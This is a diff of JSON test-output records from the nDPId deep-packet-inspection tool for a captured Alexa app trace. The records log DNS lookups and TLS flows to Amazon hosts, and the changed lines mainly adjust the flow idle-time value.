-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1490976029858,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976029858,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw9PhAAOcGq4c0XugArBAq2AG7gxTPTpIKFf8oBnASH\/5MlgAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1490976029859,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976029859,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoYetAAEAG5Z2sECrYNF7oAIMUAbsV\/ygGz06SC1AQAVeXBwAA"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976029756,"flow_last_seen":1490976029862,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976029862,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01030{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":88,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976029756,"flow_last_seen":1490976030031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1691,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1490976030031,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01361{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":90,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976029756,"flow_last_seen":1490976030031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3563,"flow_avg_l4_payload_len":395,"midstream":0,"thread_ts_msec":1490976030031,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","server_names":"mads.amazon-adsystem.com,mads.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mads.amazon.com","fingerprint":"E0:2E:BD:D6:46:9B:05:03:93:CC:A7:28:7A:F4:57:9C:EB:40:8F:AB"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029756,"flow_last_seen":1490976029756,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976029756,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1490976029756,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976029756,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8YepAAEAG5YqsECrYNF7oAIMUAbsV\/ygFAAAAAKAC\/\/9G\/wAAAgQFtAQCCAoA9knvAAAAAAEDAwg="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1490976029858,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976029858,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw9PhAAOcGq4c0XugArBAq2AG7gxTPTpIKFf8oBnASH\/5MlgAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1490976029859,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976029859,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoYetAAEAG5Z2sECrYNF7oAIMUAbsV\/ygGz06SC1AQAVeXBwAA"} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976029756,"flow_last_seen":1490976029862,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976029862,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01030{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":88,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976029756,"flow_last_seen":1490976030031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1691,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1490976030031,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01361{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":90,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976029756,"flow_last_seen":1490976030031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3563,"flow_avg_l4_payload_len":395,"midstream":0,"thread_ts_msec":1490976030031,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","server_names":"mads.amazon-adsystem.com,mads.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mads.amazon.com","fingerprint":"E0:2E:BD:D6:46:9B:05:03:93:CC:A7:28:7A:F4:57:9C:EB:40:8F:AB"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":111,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976030681,"flow_last_seen":1490976030681,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976030681,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1490976030681,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1490976030681,"pkt":"AMDKkaPvePiC0\/vCCABFAABEWlBAAEARM1+sECrYrBAqARy+ADUAMIK\/xAMBAAABAAAAAAAAC2ZpcnMtdGEtZzdnBmFtYXpvbgNjb20AAAEAAQ=="} 00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976030681,"flow_last_seen":1490976030681,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976030681,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"firs-ta-g7g.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1490976030758,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1490976030758,"pkt":"ePiC0\/vCAMDKkaPvCABFwABQalIAAEABYqGsECoBrBAq2AUBAe6sECoqRQAANMRJQAA\/Bpp3rBAq2DRV0cXXygG707KdlouELZKAEAGm9GwAAAEBCAoA9kpTbQnnbg=="} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1490976030890,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1490976030890,"pkt":"ePiC0\/vCAMDKkaPvCABFAABU0XFAAEARvC2sECoBrBAq2AA1HL4AQPRGxAOBgAABAAEAAAAAC2ZpcnMtdGEtZzdnBmFtYXpvbgNjb20AAAEAAcAMAAEAAQAAABwABDbvFrk="} 00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":116,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976030681,"flow_last_seen":1490976030890,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976030890,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"firs-ta-g7g.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.22.185"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976030894,"flow_last_seen":1490976030894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976030894,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1490976030894,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976030894,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8J69AAEAG7nysECrYNu8WudGyAbvyuG3OAAAAAKAC\/\/+kIgAAAgQFtAQCCAoA9kphAAAAAAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1490976031102,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976031102,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwN3JAAOcGN8U27xa5rBAq2AG70bLD2Mra8rhtz3ASH\/580QAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1490976031103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976031103,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoJ7BAAEAG7o+sECrYNu8WudGyAbvyuG3Pw9jK21AQAVfHQgAA"} -00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976030894,"flow_last_seen":1490976031106,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976031106,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":123,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976030894,"flow_last_seen":1490976031185,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1689,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1490976031185,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":125,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976030894,"flow_last_seen":1490976031186,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3549,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1490976031186,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","server_names":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=firs-ta-g7g.amazon.com","fingerprint":"A0:32:45:00:21:A0:00:56:62:BA:FE:E7:68:81:40:5F:68:7E:A6:86"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976030894,"flow_last_seen":1490976030894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976030894,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1490976030894,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976030894,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8J69AAEAG7nysECrYNu8WudGyAbvyuG3OAAAAAKAC\/\/+kIgAAAgQFtAQCCAoA9kphAAAAAAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1490976031102,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976031102,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwN3JAAOcGN8U27xa5rBAq2AG70bLD2Mra8rhtz3ASH\/580QAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1490976031103,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976031103,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoJ7BAAEAG7o+sECrYNu8WudGyAbvyuG3Pw9jK21AQAVfHQgAA"} +00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976030894,"flow_last_seen":1490976031106,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976031106,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":123,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976030894,"flow_last_seen":1490976031185,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1689,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1490976031185,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":125,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976030894,"flow_last_seen":1490976031186,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3549,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1490976031186,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","server_names":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=firs-ta-g7g.amazon.com","fingerprint":"A0:32:45:00:21:A0:00:56:62:BA:FE:E7:68:81:40:5F:68:7E:A6:86"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976031581,"flow_last_seen":1490976031581,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976031581,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1490976031581,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1490976031581,"pkt":"AMDKkaPvePiC0\/vCCABFAAA+WlFAAEARM2SsECrYrBAqAaBGADUAKk94StwBAAABAAAAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAQ=="} 00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976031581,"flow_last_seen":1490976031581,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976031581,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 